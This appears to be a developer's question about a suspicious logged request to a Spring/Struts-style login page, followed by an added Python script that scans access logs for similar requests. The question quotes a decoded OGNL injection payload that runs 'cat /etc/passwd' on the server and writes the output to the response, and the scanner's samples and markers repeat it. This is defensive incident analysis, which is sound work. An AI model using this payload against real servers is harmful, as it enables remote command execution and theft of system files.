I have a public-facing web application that uses Spring MVC (3.2.x) and Spring Security (3.1.x). This morning I observed requests of the following form in our access logs:
GET /MyWebAppPath/login.do?redirect:${Some URL-encoded EL code here}
What bug or feature of Spring was this attempting to exploit? Under what conditions would Spring (or some other code) evaluate that EL expression?
It looks like the `?redirect:` parameter was ignored for me, but it makes me nervous because I don't know where to look to verify that I'm not vulnerable. All my Googling has turned up unrelated things (as best I can tell).
If that code inside the `${ }` had actually run, it would have attempted to dump the contents of `/etc/passwd` to the client. (Thankfully it looks like it never did run. Plus that file doesn't exist on our system. And our Tomcat runs as a user with limited permissions.)
EDIT: Here is the actual code that was inside the `${ }`, after decoding and adding newlines to help readability:
#a=(new java.lang.ProcessBuilder(new java.lang.String[]{'cat','/etc/passwd'})).start(),
#b=#a.getInputStream(),
#c=new java.io.InputStreamReader(#b),
#d=new java.io.BufferedReader(#c),
#e=new char[50000],
#d.read(#e),
#matt=#context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),
#matt.getWriter().println(#e),
#matt.getWriter().flush(),
#matt.getWriter().close()
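As an added example (not from the poster, and not a Spring or Struts component), here is a small access-log check a defender could run to find other requests of the same shape: it pulls the request target out of each combined-format log line, URL-decodes the query (repeatedly, in case of double encoding), and flags a parameter that starts with the `redirect:` prefix and carries a `${ ... }` expression, plus the payload markers visible in the question (`ProcessBuilder`, `#context.get(`, `getWriter()`, `/etc/passwd`). The log lines are constructed samples.

```python
"""Flag access-log requests of the form login.do?redirect:${...} seen in the question."""
import re
from urllib.parse import unquote

# Request line inside a common/combined access log entry: "GET /path?query HTTP/1.1"
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')

# Strings taken from the decoded payload quoted in the question.
PAYLOAD_MARKERS = ("ProcessBuilder", "#context.get(", "getWriter()", "/etc/passwd")

# Constructed sample log lines: one attempt, one benign redirect=, one static asset.
SAMPLE_LOG = [
    '10.0.0.5 - - [10/Mar/2014:08:12:01 +0000] "GET /MyWebAppPath/login.do?redirect:'
    '%24%7B%23a%3D(new%20java.lang.ProcessBuilder(new%20java.lang.String%5B%5D%7B'
    '%27cat%27%2C%27%2Fetc%2Fpasswd%27%7D)).start()%7D HTTP/1.1" 200 512',
    '10.0.0.6 - - [10/Mar/2014:08:12:05 +0000] "GET /MyWebAppPath/login.do?redirect=/home HTTP/1.1" 302 0',
    '10.0.0.7 - - [10/Mar/2014:08:13:00 +0000] "GET /MyWebAppPath/static/app.css HTTP/1.1" 200 9000',
]

def decode_fully(s, rounds=3):
    """URL-decode until the string stops changing, so double-encoded payloads show up."""
    for _ in range(rounds):
        decoded = unquote(s)
        if decoded == s:
            break
        s = decoded
    return s

def analyze_request(target):
    """Return a list of findings for one request target (path?query); [] if clean."""
    if "?" not in target:
        return []
    query = decode_fully(target.split("?", 1)[1])
    findings = []
    for param in query.split("&"):
        if param.startswith("redirect:"):
            findings.append("redirect: parameter prefix in query")
            if "${" in param or "%{" in param:
                findings.append("expression delimiter inside redirect: parameter")
    for marker in PAYLOAD_MARKERS:
        if marker in query:
            findings.append(f"payload marker {marker!r}")
    return findings

def scan_log(lines):
    """Return (line_number, target, findings) for each suspicious log line."""
    hits = []
    for n, line in enumerate(lines, 1):
        m = REQUEST_RE.search(line)
        if m:
            findings = analyze_request(m.group("target"))
            if findings:
                hits.append((n, m.group("target"), findings))
    return hits

if __name__ == "__main__":
    for n, target, findings in scan_log(SAMPLE_LOG):
        print(f"line {n}: {target}\n  " + "\n  ".join(findings))
```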